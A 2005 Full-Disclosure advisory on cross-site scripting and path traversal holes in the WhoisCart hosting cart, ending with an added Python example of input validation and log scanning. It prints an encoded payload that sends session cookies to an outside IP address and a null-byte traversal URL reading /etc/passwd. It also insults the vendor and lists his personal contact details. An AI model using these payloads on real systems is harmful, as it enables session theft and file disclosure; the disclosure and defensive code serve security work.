Subject: Saeven.net's WhoisCart (all versions released prior to this disclosure) is vulnerable in that it allows an attacker to insert Javascript into user viewed pages, and also to view any world readable file on the server hosting the WhoisCart software.

Severity: Severe; these vulnerabilities can allow an attacker to access literally any part of a system, as plaintext database passwords can be read from the WhoisCart configuration, or users' session ID cookies stolen and used to access user accounts.

Preamble: (Taken from http://www.whoiscart.net/)

Able to remember, and apt at making your life easier - Whois.Cart 2.2 is a hosting and domains shopping cart and billing management system that will most likely be your best friend during your domain hosting and registration business venture. Easily skinned using our versatile theme architecture, with support for over a dozen payment portals, fourteen different languages, and capable of all billing recurrences; the system is quickly becoming the most popular and highest rated script in its class [1]. Coded entirely in PHP, we challenge you to find a system faster than ours. Long-ranked in Zend's Top 10, and by far the most feature packed software for its price - come and see why exactly 3155 users just can't be wrong.

Problem:

The first vulnerability, involving Javascript injection and ultimately session ID extraction, is exploited through an unsanitized user input field, the page parameter of profile.php, which is echoed back into the page unescaped:

http://yourdomain.com/whoiscart/profile.php?page=INSERT_JAVASCRIPT_HERE

Basically, URL encode some Javascript, like so:

turns into:

%3Cbody+onload%3Ddocument.forms%5B0%5D.submit%28document.cookie%29%3E%3Cform+name%3Dform1+action%3Dhttp%3A%2F%2F12.202.41.221%2F%7Evic%2Ftest.php%3E%3C%2Fform%3E%3C%2Fbody%3E

Then that URL encoded Javascript is inserted at the appropriate location above.

Next Problem:

The next vulnerability involves the plain-text printing of any world readable file on the system (including any and all configuration files used to run WhoisCart, store session IDs, store plaintext database passwords, etc.). The language parameter is used directly as a file path:

http://yourdomain.com/whoiscart/?language=../../../../../../../../../../../../../etc/passwd%00

There you have the ability to read any world readable file on the server. The %00 appends a null character, so that the suffix the script adds is cut off and you do not end up opening something like /etc/passwd.php.

Workaround:

Use different software, not written by a 12 year old (no offense to any kids reading this, but think about security, for once). The vulnerabilities shown here are indicative of a truly inferior software product. The product is not even feature complete. The beta that's been in progress for 2 years, can be seen at http://beta.whoiscart.net/admin/, barely started. Vulnerabilities like this still exist, and have existed throughout the software since its inception. The only fix for this is for Saeven.net to release a new product, rewritten from the ground up, or for the consumer to choose a new product altogether (yes, there are better ones on the market for the same price, try Google). If a software allows the unauthorized viewing of globally readable files, the software has already failed, and deserves to be shot down such as this.

Vendor Contact:

saeven.net consulting
Alexandre Lemaire (registrations@saeven.net)
1968 Portobello blvd
Orleans Ontario, K4A 4E0
CA
Tel. +91.226370256 (If you call, careful you don't get his mom)

Disclosure Timeline:

Vendor Notified: June 21, 2005
Public Release: June 22, 2005

About the Author:

The author is a software engineer, with an absolute detest for bullshit.
Sometimes I detest some languages, because they allow punks like this to write shit software, and then the dumbass programmer puts up a website, uses the word "innovative", and ends up ultimately screwing over a few hundred people, who maintain the personal information of thousands of people. Identity theft starts with "companies" such as this. Choose a trusted solution. The ability to crunch a few numbers, or execute a few lines of PHP, does NOT make something trustworthy. A company with a non-fictitious in-house lawyer is a good start, and then a company who knows what the fuck they're doing when it comes to software design and implementation is stellar. It is this type of bullshit I detest, and I advise everyone against using this product, for numerous reasons, all founding from the same core element: a product is not to be trusted because of a flashy website, or because some kid lies about his age.

Conclusion:

Here is an email, verbatim from Mr. Lemaire:

From: "S. Alexandre M. Lemaire"

I'll indulge your comments. The truth is that I don't maintain the work on whois.cart currently. I have a staff of 13 people working for me right now, the developments are intense and I don't have the time to monitor them as I usually would. They package and operate independently from myself. My user community knows well (as I post frequent updates in the forums) that I'm currently vested into our other project, our helpdesk. We have a user base of 3000+, you aren't the only one to submit bug reports - note also that the people that work for me, aren't bored teenagers. They are people with M.Scs and PhDs in computer science and related fields, who've agreed to partake in the whois.cart project on their spare time initially. Your concern for security, is not exclusive.

Show me a person with a Masters or PhD in Computer Science that both works in the webhosting software industry and writes shit software like this, and I will show you shit that smells like roses.
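The two findings above (the unescaped page parameter of profile.php, and the language parameter used as a file path with a %00 to cut off the appended suffix) both come down to missing input validation. The following is an added example, not WhoisCart code and not from the advisory's author: it shows the handling that would have closed both holes, plus a small scanner that flags the two request shapes in web server access logs. The language allowlist, the directory name and the log lines are constructed for the demonstration.

```python
"""Defensive handling for the two WhoisCart parameters named in the advisory.

Added example, not WhoisCart's own code. Assumes one language file per
supported language under a directory the application controls; the allowlist,
directory and sample log lines below are constructed for this demonstration.
"""
import html
import os
import re
from typing import List, Optional, Tuple
from urllib.parse import parse_qs, urlsplit

# Constructed allowlist: the only names the language resolver will accept.
SUPPORTED_LANGUAGES = frozenset({"english", "french", "german"})


def resolve_language_file(lang_dir: str, requested: str) -> Optional[str]:
    """Return the language file path for `requested`, or None if it is rejected.

    Three checks, in order of cheapness: an embedded NUL is refused (the %00
    trick only works because a C-level open() stops at the first NUL, so the
    appended ".php" suffix is never seen); the value must be on the allowlist,
    so "../" sequences never reach the filesystem at all; and the resolved path
    must still lie inside lang_dir, as defence in depth against a symlinked or
    misconfigured language directory.
    """
    if "\x00" in requested:
        return None
    if requested not in SUPPORTED_LANGUAGES:
        return None
    base = os.path.realpath(lang_dir)
    candidate = os.path.realpath(os.path.join(base, requested + ".php"))
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate


def render_page_name(page: str) -> str:
    """Echo the `page` parameter into HTML with every metacharacter escaped.

    html.escape turns < > & " ' into entities, so a value such as
    <body onload=...> is displayed as text instead of being parsed as markup.
    """
    return "<h1>" + html.escape(page, quote=True) + "</h1>"


# Constructed Apache common-log-format lines: one benign request, then the two
# request shapes described in the advisory (exfiltration address replaced by a
# harmless alert for the sample).
SAMPLE_LOG = [
    '203.0.113.5 - - [22/Jun/2005:10:00:01 +0000] '
    '"GET /whoiscart/?language=english HTTP/1.1" 200 512',
    '203.0.113.9 - - [22/Jun/2005:10:00:02 +0000] '
    '"GET /whoiscart/?language=../../../../etc/passwd%00 HTTP/1.1" 200 1033',
    '203.0.113.9 - - [22/Jun/2005:10:00:03 +0000] '
    '"GET /whoiscart/profile.php?page=%3Cbody+onload%3Dalert%281%29%3E HTTP/1.1" 200 2048',
]

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')
# A "<" followed by a tag-name character or "!" / "/" is markup, not a stray
# less-than sign in ordinary text.
TAG_RE = re.compile(r"<[a-z!/]", re.IGNORECASE)


def flag_request_line(line: str) -> List[str]:
    """Return the names of suspicious patterns found in one access-log line.

    parse_qs percent-decodes the values, so %00 is checked as a real NUL byte
    and %3C as a real "<"; single-level encoding is therefore handled, while
    double-encoded values (%252e) would need an extra decode pass.
    """
    match = REQUEST_RE.search(line)
    if not match:
        return []
    query = parse_qs(urlsplit(match.group(1)).query, keep_blank_values=True)
    findings = []
    for value in query.get("language", []):
        if "../" in value or "..\\" in value or "\x00" in value:
            findings.append("language traversal/null byte")
    for value in query.get("page", []):
        if TAG_RE.search(value):
            findings.append("page HTML injection")
    return findings


def scan_log(lines: List[str]) -> List[Tuple[int, str]]:
    """Pair each finding with the index of the log line it came from."""
    return [(i, f) for i, line in enumerate(lines) for f in flag_request_line(line)]


if __name__ == "__main__":
    for index, finding in scan_log(SAMPLE_LOG):
        print(f"line {index}: {finding}")
    print(render_page_name("<body onload=alert(1)>"))
```

The allowlist is the real fix for the file inclusion: stripping "../" or NUL bytes from a path that is still assembled from user input leaves every encoding variant to be discovered later, whereas a value that is not one of a handful of known names never touches the filesystem. Current PHP releases reject paths containing a NUL byte in their filesystem functions, so the exact %00 form no longer truncates the suffix, but the traversal itself is unaffected by that and still needs the allowlist.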
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/